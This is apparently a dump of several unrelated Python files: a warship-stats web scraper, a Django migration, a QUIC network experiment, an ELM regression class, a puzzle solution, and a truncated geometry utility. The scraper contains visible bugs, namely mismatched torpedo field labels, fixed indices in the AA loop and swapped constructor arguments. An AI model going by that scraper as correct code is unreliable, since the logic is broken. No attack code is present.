shiparray['shipMainGunDispersion'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shiparray['shipMainGunHEShell'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shiparray['shipMainGunHEDam'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shiparray['shipMainGunHEFire'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shiparray['shipMainGunHEVel'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shiparray['shipMainGunHEWeight'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shiparray['shipMainGunAPShell'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shiparray['shipMainGunAPDam'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shiparray['shipMainGunAPVel'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shiparray['shipMainGunAPWeight'] = stat.find('span',class_='t-performance_right').text
# print(shipMainGun)
# print(shipMainGunCount)
# print(shipMainGunROF)
# print(shipMainGunReload)
# print(shipMainGunRotate)
# print(shipMainGun180)
# print(shipMainGunRange)
# print(shipMainGunDispersion)
# print(shipMainGunHEShell)
# print(shipMainGunHEDam)
# print(shipMainGunHEFire)
# print(shipMainGunHEVel)
# print(shipMainGunHEWeight)
# print(shipMainGunAPShell)
# print(shipMainGunAPDam)
# print(shipMainGunAPVel)
# print(shipMainGunAPWeight)
###Secondary Batteries
elif groupName == 'Secondary Armament #1':
shipSec1Gun = ''
shipSec1GunCount = ''
shipSec1GunROF = ''
shipSec1GunReload = ''
shipSec1GunRotate = ''
shipSec1Gun180 = ''
shipSec1GunRange = ''
shipSec1GunDispersion = ''
shipSec1GunHEShell = ''
shipSec1GunHEDam = ''
shipSec1GunHEFire = ''
shipSec1GunHEVel = ''
shipSec1GunHEWeight = ''
shipSec1GunAPShell = ''
shipSec1GunAPDam = ''
shipSec1GunAPVel = ''
shipSec1GunAPWeight = ''
shipSec1Gun = stats[0].find('span',class_='t-performance_left').text
shipSec1GunCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shipSec1GunROF = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shipSec1GunReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shipSec1GunRotate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shipSec1Gun180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shipSec1GunRange = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shipSec1GunDispersion = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shipSec1GunHEShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shipSec1GunHEDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shipSec1GunHEFire = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipSec1GunHEVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipSec1GunHEWeight = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipSec1GunAPShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipSec1GunAPDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipSec1GunAPVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipSec1GunAPWeight = stat.find('span',class_='t-performance_right').text
elif groupName == 'Secondary Armament #2':
shipSec2Gun = ''
shipSec2GunCount = ''
shipSec2GunROF = ''
shipSec2GunReload = ''
shipSec2GunRotate = ''
shipSec2Gun180 = ''
shipSec2GunRange = ''
shipSec2GunDispersion = ''
shipSec2GunHEShell = ''
shipSec2GunHEDam = ''
shipSec2GunHEFire = ''
shipSec2GunHEVel = ''
shipSec2GunHEWeight = ''
shipSec2GunAPShell = ''
shipSec2GunAPDam = ''
shipSec2GunAPVel = ''
shipSec2GunAPWeight = ''
shipSec2Gun = stats[0].find('span',class_='t-performance_left').text
shipSec2GunCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shipSec2GunROF = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shipSec2GunReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shipSec2GunRotate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shipSec2Gun180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shipSec2GunRange = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shipSec2GunDispersion = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shipSec2GunHEShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shipSec2GunHEDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shipSec2GunHEFire = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipSec2GunHEVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipSec2GunHEWeight = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipSec2GunAPShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipSec2GunAPDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipSec2GunAPVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipSec2GunAPWeight = stat.find('span',class_='t-performance_right').text
elif groupName == 'Secondary Armament #3':
shipSec3Gun = ''
shipSec3GunCount = ''
shipSec3GunROF = ''
shipSec3GunReload = ''
shipSec3GunRotate = ''
shipSec3Gun180 = ''
shipSec3GunRange = ''
shipSec3GunDispersion = ''
shipSec3GunHEShell = ''
shipSec3GunHEDam = ''
shipSec3GunHEFire = ''
shipSec3GunHEVel = ''
shipSec3GunHEWeight = ''
shipSec3GunAPShell = ''
shipSec3GunAPDam = ''
shipSec3GunAPVel = ''
shipSec3GunAPWeight = ''
shipSec3Gun = stats[0].find('span',class_='t-performance_left').text
shipSec3GunCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shipSec3GunROF = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shipSec3GunReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shipSec3GunRotate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shipSec3Gun180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shipSec3GunRange = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shipSec3GunDispersion = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shipSec3GunHEShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shipSec3GunHEDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shipSec3GunHEFire = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipSec3GunHEVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipSec3GunHEWeight = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipSec3GunAPShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipSec3GunAPDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipSec3GunAPVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipSec3GunAPWeight = stat.find('span',class_='t-performance_right').text
### Torpedo Tubes
elif groupName == 'Torpedo Tubes':
shipTorpTube = ''
shipTorpCount = ''
shipTorpReload = ''
shipTorpRorate = ''
shipTorp180 = ''
shipTorp = ''
shipTorpDam = ''
shipTorpSpeed = ''
shipTorpRange = ''
shipTorpTube = stats[0].find('span',class_='t-performance_left').text
shipTorpCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipTorpReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipTorpRorate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipTorp180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipTorp = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipTorpDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipTorpSpeed = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipTorpRange = stat.find('span',class_='t-performance_right').text
elif groupName == 'AA Defense':
####FUCKING AA GUNS
#### for each ship's count of AA guns, add them to an array. When it's time to print, take the highest number of AA guns and make that the number of AA guns in the sheet
ship0AA = ''
ship0AACount = ''
ship0AADps = ''
ship0AArange = ''
ship1AA = ''
ship1AACount = ''
ship1AADps = ''
ship1AArange = ''
ship2AA = ''
ship2AACount = ''
ship2AADps = ''
ship2AArange = ''
ship3AA = ''
ship3AACount = ''
ship3AADps = ''
ship3AArange = ''
ship4AA = ''
ship4AACount = ''
ship4AADps = ''
ship4AArange = ''
class AAgun:
gun = ""
guncount = ""
gunrange = ""
gundps = ""
def __init__(self,gunname,count,grange,dps):
self.gun = gunname
self.guncount = count
self.gunrange = grange
self.gundps = dps
def calculatedps(self):
turrets = self.guncount.split('x')[0]
barrelsper = self.guncount.split('x')[1]
totaldps = float(turrets)*float(barrelsper)*float(self.gundps)
return totaldps
def print (self):
print("this is my fun gun")
print(self.gun)
print(self.guncount)
print(self.gunrange)
print(self.gundps)
shipAAguns = []
statcount = range(0,len(stats),1)
thegun = ""
thecount = ""
therange = ""
thedps = ""
for i in statcount:
# print(i)
if i%3 == 0:
# print(str(i)+"%3=0")
# print("turn this into the gun name and count")
thegun = stats[0].find('span',class_='t-performance_left').text
thecount = stats[0].find('span',class_='t-performance_right').text.replace("pcs.","").replace(' ','')
if i%3 ==1:
# print(str(i)+"%3=1")
# print("this is going to be the dps")
thedps = stats[1].find('span',class_='t-performance_right').text
if i%3 == 2:
# print(str(i)+"%3=2")
# print("this is going to be the range")
therange = stats[2].find('span',class_='t-performance_right').text
newgun = AAgun(thegun,thecount,thedps,therange)
shipAAguns.append(newgun)
thegun = ""
thecount = ""
thedps = ""
therange = ""
# for gun in shipAAguns:
# gun.print()
# for stat in stats:
# print(stat)
# # if line doesn't start with '...'
##TODO - multiple AA Defense
### Maneuverability
elif groupName == 'Maneuverability':
shipSpeed = ''
shipTurnRadius = ''
shipRudderShift = ''
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Maximum Speed':
shipSpeed = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Turning Circle Radius':
shipTurnRadius = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rudder Shift Time':
shipRudderShift = stat.find('span',class_='t-performance_right').text
### Concealment
elif groupName == 'Concealment':
shipSurfaceDetect = ''
shipAirDetect = ''
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Surface Detectability Range':
shipSurfaceDetect = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Air Detectability Range':
shipAirDetect = stat.find('span',class_='t-performance_right').text
shipBattleLevels = ""
for shipBattleLevel in thisShipSoup.find('span',class_='b-battles-levels_interval'):
if shipBattleLevels == "":
shipBattleLevels = shipBattleLevel.text
else:
shipBattleLevels = shipBattleLevels + "," + shipBattleLevel.text
print("levels:"+shipBattleLevels)
for level in shipBattleLevels.split(','):
# print('battle level '+level)
thesheet = shipsheet['BattleLevel '+level]
thisrow = thesheet.max_row+1
# print('next free row is '+str(thisrow))
for shipvalue in shiparray:
# print('shipvalue we are writing is '+shipvalue)
for i in range(1,thesheet.max_column+1):
if thesheet.cell(row=1,column=i).value == shipvalue:
# print('the column for this value is '+str(i))
# print('saving ')
thesheet.cell(row=thisrow,column=i).value = shiparray[shipvalue]
# input("Press a key to continue...")
shipsheet.save(shipfilename) |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards(apps, schema_editor):
LawFirm = apps.get_model('law_firm', 'LawFirm')
for law_firm in LawFirm.objects.all():
law_firm.payment_plan = 'daily'
law_firm.save()
def backwards(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('law_firm', '0018_auto_20180628_0533'),
]
operations = [
migrations.RunPython(forwards,backwards),
]
|
from mpExperience import MpExperience
from mpParamXp import MpParamXp
import os
class MpExperienceQUICReqres(MpExperience):
GO_BIN = "/usr/local/go/bin/go"
SERVER_LOG = "quic_server.log"
CLIENT_LOG = "quic_client.log"
#CLIENT_GO_FILE = "~/go/src/github.com/lucas-clemente/quic-go/example/reqres/client/reqres.go"
#SERVER_GO_FILE = "~/go/src/github.com/lucas-clemente/quic-go/example/reqres/reqres.go"
PING_OUTPUT = "ping.log"
def __init__(self, xpParamFile, mpTopo, mpConfig):
MpExperience.__init__(self, xpParamFile, mpTopo, mpConfig)
self.loadParam()
self.ping()
MpExperience.classicRun(self)
def ping(self):
self.mpTopo.commandTo(self.mpConfig.client, "rm " + \
MpExperienceQUICReqres.PING_OUTPUT )
count = self.xpParam.getParam(MpParamXp.PINGCOUNT)
for i in range(0, self.mpConfig.getClientInterfaceCount()):
cmd = self.pingCommand(self.mpConfig.getClientIP(i),
self.mpConfig.getServerIP(), n = count)
self.mpTopo.commandTo(self.mpConfig.client, cmd)
def pingCommand(self, fromIP, toIP, n=5):
s = "ping -c " + str(n) + " -I " + fromIP + " " + toIP + \
" >> " + MpExperienceQUICReqres.PING_OUTPUT
print(s)
return s
def loadParam(self):
"""
todo : param LD_PRELOAD ??
"""
self.run_time = self.xpParam.getParam(MpParamXp.QUICREQRESRUNTIME)
self.multipath = self.xpParam.getParam(MpParamXp.QUICMULTIPATH)
self.project = self.xpParam.getParam(MpParamXp.PROJECT)
self.multifile = self.xpParam.getParam(MpParamXp.MULTIFILE)
self.client_go_file = "~/go/src/github.com/lucas-clemente/"+self.project+"/example/client_benchmarker/main.go"
self.server_go_file = "~/go/src/github.com/lucas-clemente/"+self.project+"/example/main.go"
def prepare(self):
MpExperience.prepare(self)
self.mpTopo.commandTo(self.mpConfig.client, "rm " + \
MpExperienceQUICReqres.CLIENT_LOG )
self.mpTopo.commandTo(self.mpConfig.server, "rm " + \
MpExperienceQUICReqres.SERVER_LOG )
def getQUICReqresServerCmd(self):
s = MpExperienceQUICReqres.GO_BIN + " run " + self.server_go_file
s += " -addr 0.0.0.0:8080 &>" + MpExperienceQUICReqres.SERVER_LOG + " &"
print(s)
return s
def getQUICReqresClientCmd(self):
s = MpExperienceQUICReqres.GO_BIN + " run " + self.client_go_file
s += " -addr " + self.mpConfig.getServerIP() + ":8080 -runTime " + self.run_time + "s"
if int(self.multipath) > 0:
s += " -m"
s += " &>" + MpExperienceQUICReqres.CLIENT_LOG
print(s)
return s
def clean(self):
MpExperience.clean(self)
def run(self):
cmd = self.getQUICReqresServerCmd()
self.mpTopo.commandTo(self.mpConfig.server, "netstat -sn > netstat_server_before")
self.mpTopo.commandTo(self.mpConfig.server, cmd)
self.mpTopo.commandTo(self.mpConfig.client, "sleep 2")
cmd = self.getQUICReqresClientCmd()
self.mpTopo.commandTo(self.mpConfig.client, "netstat -sn > netstat_client_before")
self.mpTopo.commandTo(self.mpConfig.client, cmd)
self.mpTopo.commandTo(self.mpConfig.server, "netstat -sn > netstat_server_after")
self.mpTopo.commandTo(self.mpConfig.client, "netstat -sn > netstat_client_after")
self.mpTopo.commandTo(self.mpConfig.server, "pkill -f " + self.server_go_file)
self.mpTopo.commandTo(self.mpConfig.client, "sleep 2")
# Need to delete the go-build directory in tmp; could lead to no more space left error
self.mpTopo.commandTo(self.mpConfig.client, "rm -r /tmp/go-build*")
|
# -*- coding: utf-8 -*-
"""
This file contains ELMKernel classes and all developed methods.
"""
# Python2 support
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from .mltools import *
import numpy as np
import optunity
import ast
import sys
if sys.version_info < (3, 0):
import ConfigParser as configparser
else:
import configparser
try:
from scipy.special import expit
except ImportError:
_SCIPY = 0
else:
_SCIPY = 1
# Find configuration file
from pkg_resources import Requirement, resource_filename
_ELMR_CONFIG = resource_filename(Requirement.parse("elm"), "elm/elmr.cfg")
class ELMRandom(MLTools):
"""
A Python implementation of ELM Random Neurons defined by Huang[1].
An ELM is a single-hidden layer feedforward network (SLFN) proposed by
Huang back in 2006, in 2012 the author revised and introduced a new
concept of using kernel functions to his previous work.
This implementation currently accepts both methods proposed at 2012,
random neurons and kernel functions to estimate classifier/regression
functions.
Let the dimensionality "d" of the problem be the sum of "t" size (number of
targets per pattern) and "f" size (number of features per pattern).
So, d = t + f
The data will be set as Pattern = (Target | Features).
If database has *N* patterns, its size follows *Nxd*.
Note:
[1] Paper reference: Huang, 2012, "Extreme Learning Machine for
Regression and Multiclass Classification"
Attributes:
input_weight (numpy.ndarray): a random matrix (*Lxd-1*) needed
to calculate H(**x**).
output_weight (numpy.ndarray): a column vector (*Nx1*) calculated
after training, represent :math:\\beta.
bias_of_hidden_neurons (numpy.ndarray): a random column vector
(*Lx1*) needed to calculate H(**x**).
param_function (str): function that will be used for training.
param_c (float): regularization coefficient (*C*) used for training.
param_l (list of float): number of neurons that will be used for
training.
param_opt (bool): a boolean used to calculate an optimization
when number of training patterns are much larger than neurons
(N >> L).
Other Parameters:
regressor_name (str): The name of classifier/regressor.
available_functions (list of str): List with all available
functions.
default_param_function (str): Default function if not set at
class constructor.
default_param_c (float): Default parameter c value if not set at
class constructor.
default_param_l (integer): Default number of neurons if not set at
class constructor.
default_param_opt (bool): Default boolean optimization flag.
Note:
* **regressor_name**: defaults to "elmr".
* **default_param_function**: defaults to "sigmoid".
* **default_param_c**: defaults to 2 ** -6.
* **default_param_l**: defaults to 500.
* **default_param_opt**: defaults to False.
"""
def __init__(self, params=[]):
"""
Class constructor.
Arguments:
params (list): first argument (*str*) is an available function,
second argument (*float*) is the coefficient *C* of
regularization, the third is the number of hidden neurons
and the last argument is an optimization boolean.
Example:
>>> import elm
>>> params = ["sigmoid", 1, 500, False]
>>> elmr = elm.ELMRandom(params)
"""
super(self.__class__, self).__init__()
self.available_functions = ["sigmoid", "multiquadric"]
self.regressor_name = "elmr"
self.default_param_function = "sigmoid"
self.default_param_c = 2 ** -6
self.default_param_l = 500
self.default_param_opt = False
self.input_weight = []
self.output_weight = []
self.bias_of_hidden_neurons = []
# Initialized parameters values
if not params:
self.param_function = self.default_param_function
self.param_c = self.default_param_c
self.param_l = self.default_param_l
self.param_opt = self.default_param_opt
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
# ########################
# Private Methods
# ########################
def __set_random_weights(self, number_of_hidden_nodes,
number_of_attributes):
"""
Initialize random values to calculate function
Arguments:
number_hidden_nodes (int): number of neurons.
number_of_attributes (int): number of features.
"""
self.input_weight = np.random.rand(number_of_hidden_nodes,
number_of_attributes) * 2 - 1
self.bias_of_hidden_neurons = np.random.rand(number_of_hidden_nodes, 1)
def __map_hidden_layer(self, function_type, number_hidden_nodes, data):
"""
Map argument "data" to the hidden layer feature space.
Arguments:
function_type (str): function to map input data to feature
space.
number_hidden_nodes (int): number of hidden neurons.
data (numpy.ndarray): data to be mapped to feature space.
Returns:
numpy.ndarray: mapped data.
"""
number_of_data = data.shape[0]
if function_type == "sigmoid" or function_type == "sig" or \
function_type == "sin" or function_type == "sine" or \
function_type == "hardlim" or \
function_type == "tribas":
temp = np.dot(self.input_weight, data.conj().T)
bias_matrix = np.tile(self.bias_of_hidden_neurons,
number_of_data)
temp = temp + bias_matrix
elif function_type == "mtquadric" or function_type == "multiquadric":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = temp.conj().T + \
np.tile(self.bias_of_hidden_neurons ** 2, number_of_data)
elif function_type == "gaussian" or function_type == "rbf":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = \
np.multiply(temp.conj().T, np.tile(self.bias_of_hidden_neurons,
number_of_data))
else:
print("Error: Invalid function type")
return
if function_type == "sigmoid" or function_type == "sig":
if _SCIPY:
h_matrix = expit(temp)
else:
h_matrix = 1 / (1 + np.exp(-temp))
elif function_type == "sine" or function_type == "sin":
h_matrix = np.sin(temp)
elif function_type == "mtquadric" or function_type == "multiquadric":
h_matrix = np.sqrt(temp)
elif function_type == "gaussian" or function_type == "rbf":
h_matrix = np.exp(temp)
else:
print("Error: Invalid function type")
return
return h_matrix
def _local_train(self, training_patterns, training_expected_targets,
params):
# If params not provided, uses initialized parameters values
if not params:
pass
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
number_of_attributes = training_patterns.shape[1]
self.__set_random_weights(self.param_l, number_of_attributes)
h_train = self.__map_hidden_layer(self.param_function, self.param_l,
training_patterns)
# If N >>> L, param_opt should be True
if self.param_opt:
self.output_weight = np.linalg.solve(
(np.eye(h_train.shape[0]) / self.param_c) +
np.dot(h_train, h_train.conj().T),
np.dot(h_train, training_expected_targets))
else:
self.output_weight = np.dot(h_train, np.linalg.solve(
((np.eye(h_train.shape[1]) / self.param_c) + np.dot(
h_train.conj().T, h_train)),
training_expected_targets))
training_predicted_targets = np.dot(h_train.conj().T,
self.output_weight)
return training_predicted_targets
def _local_test(self, testing_patterns, testing_expected_targets,
predicting):
h_test = self.__map_hidden_layer(self.param_function, self.param_l,
testing_patterns)
testing_predicted_targets = np.dot(h_test.conj().T, self.output_weight)
return testing_predicted_targets
# ########################
# Public Methods
# ########################
def search_param(self, database, dataprocess=None, path_filename=("", ""),
save=False, cv="ts", of="rmse", f=None, eval=50):
"""
Search best hyperparameters for classifier/regressor based on
optunity algorithms.
Arguments:
database (numpy.ndarray): a matrix containing all patterns
that will be used for training/testing at some
cross-validation method.
dataprocess (DataProcess): an object that will pre-process
database before training. Defaults to None.
path_filename (tuple): *TODO*.
save (bool): *TODO*.
cv (str): Cross-validation method. Defaults to "ts".
of (str): Objective function to be minimized at
optunity.minimize. Defaults to "rmse".
f (list of str): a list of functions to be used by the
search. Defaults to None, this set all available
functions.
eval (int): Number of steps (evaluations) to optunity algorithm.
Each set of hyperparameters will perform a cross-validation
method chosen by param cv.
Available *cv* methods:
- "ts" :func:`mltools.time_series_cross_validation()`
Perform a time-series cross-validation suggested by Hydman.
- "kfold" :func:`mltools.kfold_cross_validation()`
Perform a k-fold cross-validation.
Available *of* function:
- "accuracy", "rmse", "mape", "me".
See Also:
http://optunity.readthedocs.org/en/latest/user/index.html
"""
if f is None:
search_functions = self.available_functions
elif type(f) is list:
search_functions = f
else:
raise Exception("Invalid format for argument 'f'.")
print(self.regressor_name)
print("##### Start search #####")
config = configparser.ConfigParser()
if sys.version_info < (3, 0):
config.readfp(open(_ELMR_CONFIG))
else:
config.read_file(open(_ELMR_CONFIG))
best_function_error = 99999.9
temp_error = best_function_error
best_param_function = ""
best_param_c = 0
best_param_l = 0
for function in search_functions:
if sys.version_info < (3, 0):
elmr_c_range = ast.literal_eval(config.get("DEFAULT",
"elmr_c_range"))
neurons = config.getint("DEFAULT", "elmr_neurons")
else:
function_config = config["DEFAULT"]
elmr_c_range = ast.literal_eval(function_config["elmr_c_range"])
neurons = ast.literal_eval(function_config["elmr_neurons"])
param_ranges = [[elmr_c_range[0][0], elmr_c_range[0][1]]]
def wrapper_opt(param_c):
"""
Wrapper for optunity.
"""
if cv == "ts":
cv_tr_error, cv_te_error = \
time_series_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
elif cv == "kfold":
cv_tr_error, cv_te_error = \
kfold_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
else:
raise Exception("Invalid type of cross-validation.")
if of == "accuracy":
util = 1 / cv_te_error.get_accuracy()
else:
util = cv_te_error.get(of)
# print("c:", param_c, "util: ", util)
return util
optimal_pars, details, _ = \
optunity.minimize(wrapper_opt,
solver_name="cma-es",
num_evals=eval,
param_c=param_ranges[0])
# Save best function result
if details[0] < temp_error:
temp_error = details[0]
if of == "accuracy":
best_function_error = 1 / temp_error
else:
best_function_error = temp_error
best_param_function = function
best_param_c = optimal_pars["param_c"]
best_param_l = neurons
if of == "accuracy":
print("Function: ", function,
" best cv value: ", 1/details[0])
else:
print("Function: ", function,
" best cv value: ", details[0])
# MLTools Attribute
self.cv_best_rmse = best_function_error
# elmr Attribute
self.param_function = best_param_function
self.param_c = best_param_c
self.param_l = best_param_l
print("##### Search complete #####")
self.print_parameters()
return None
def print_parameters(self):
"""
Print current parameters.
"""
print()
print("Regressor Parameters")
print()
print("Regularization coefficient: ", self.param_c)
print("Function: ", self.param_function)
print("Hidden Neurons: ", self.param_l)
print()
print("CV error: ", self.cv_best_rmse)
print("")
print()
def get_available_functions(self):
"""
Return available functions.
"""
return self.available_functions
def train(self, training_matrix, params=[]):
"""
Calculate output_weight values needed to test/predict data.
If params is provided, this method will use at training phase.
Else, it will use the default value provided at object
initialization.
Arguments:
training_matrix (numpy.ndarray): a matrix containing all
patterns that will be used for training.
params (list): a list of parameters defined at
:func:`ELMKernel.__init__`
Returns:
:class:`Error`: training error object containing expected,
predicted targets and all error metrics.
Note:
Training matrix must have target variables as the first column.
"""
return self._ml_train(training_matrix, params)
def test(self, testing_matrix, predicting=False):
"""
Calculate test predicted values based on previous training.
Args:
testing_matrix (numpy.ndarray): a matrix containing all
patterns that will be used for testing.
predicting (bool): Don't set.
Returns:
:class:`Error`: testing error object containing expected,
predicted targets and all error metrics.
Note:
Testing matrix must have target variables as the first column.
"""
return self._ml_test(testing_matrix, predicting)
@copy_doc_of(MLTools._ml_predict)
def predict(self, horizon=1):
return self._ml_predict(horizon)
@copy_doc_of(MLTools._ml_train_iterative)
def train_iterative(self, database_matrix, params=[], sliding_window=168,
k=1):
return self._ml_train_iterative(database_matrix, params,
sliding_window, k)
|
N, M = map( int, input().split())
Q = [[int(s) for s in input().split()] for _ in range(M)]
Q = sorted(Q)
ans = 1
LQ = len(Q)
stan = Q[0][1]
while LQ != 0:
k = 1
if Q[0][0] < stan:
stan = min(stan,Q.pop(0)[1])
LQ -= 1
else:
ans += 1
stan = Q[0][1]
print(ans)
|
import os
import csv
import copy
import time
import math
import numpy as np
import matplotlib.pyplot as plt
import minisam
def getConstDigitsNumber(val, num_digits):
return "{:.{}f}".format(val, num_digits)
def getUnixTime():
return int(time.time())
def eulerAnglesToRotationMatrix(theta):
R_x = np.array([[1, 0, 0],
[0, math.cos(theta[0]), -math.sin(theta[0])],
[0, math.sin(theta[0]), math.cos(theta[0])]
])
R_y = np.array([[math.cos(theta[1]), 0, math.sin(theta[1])],
[0, 1, 0],
[-math.sin(theta[1]), 0, math.cos(theta[1])]
])
R_z = np.array([[math.cos(theta[2]), -math.sin(theta[2]), 0],
[math.sin(theta[2]), math.cos(theta[2]), 0],
[0, 0, 1]
])
R = np.dot(R_z, np.dot(R_y, R_x))
return R
def yawdeg2so3(yaw_deg):
